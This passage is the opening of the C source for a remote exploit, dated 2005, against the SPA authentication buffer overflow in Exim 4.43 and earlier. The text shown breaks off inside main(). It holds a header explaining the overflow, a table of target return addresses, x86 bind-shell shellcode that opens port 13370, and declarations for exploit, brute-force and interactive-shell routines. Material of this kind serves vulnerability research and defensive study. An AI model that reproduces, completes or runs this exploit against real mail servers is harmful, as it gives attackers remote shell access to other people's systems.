1 /* ecl−eximspa.c
2 * Yuri Gushin <yuri@eclipse.org.il>
3 *
4 * Howdy :)
5 * This is pretty straightforward, an exploit for the recently
6 * discovered vulnerability in Exim’s (all versions prior to and
7 * including 4.43) SPA authentication code − spa_base64_to_bits()
8 * will overflow a fixed−size buffer since there’s no decent
9 * boundary checks before it in auth_spa_server()
10 *
11 * Greets fly out to the ECL crew, Alex Behar, Valentin Slavov
12 * blexim, manevski, elius, shrink, and everyone else who got left
13 * out :D
14 *
15 */
16
17 #include <stdlib.h>
18 #include <stdio.h>
19 #include <unistd.h>
20 #include <string.h>
21 #include <err.h>
22 #include <netinet/in.h>
23 #include <sys/socket.h>
24 #include <sys/types.h>
25 #include <netdb.h>
26 #include <arpa/inet.h>
27
28 #define SC_PORT 13370
29 #define NOP 0xfd
30
31 struct {
32 char *name;
33 int retaddr;
34 } targets[] = {
35 { "Bruteforce", 0xbfffffff },
36 { "Debian Sarge exim4−daemon−heavy_4.34−9", 0xbfffed00 },
37 };
38
39 char sc[] = // thank you metasploit, skape, vlad902
40 "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
41 "\x43\x52\x66\x68\x34\x3a\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
42 "\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
43 "\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
44 "\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
45 "\x89\xe1\xcd\x80";
46
47 struct {
48 struct sockaddr_in host;
49 int target;
50 int offset;
51 u_short wait;
52 } options;
Page 1/7
Exim 4.43 auth_spa_server Remote PoC Exploit
Yuri Gushin
02/12/2005
53
54 static int brutemode;
55
56 int connect_port(u_short port);
57 void init_SPA(int sock);
58 void exploit(int sock, int address);
59 void shell(int sock);
60 void spa_bits_to_base64 (unsigned char *out, const unsigned char *in, int inlen);
61 void parse_options(int argc, char **argv);
62 void usage(char *cmd);
63 void banner(void);
64
65 int main(int argc, char **argv)
66 {
67 int address, sock_s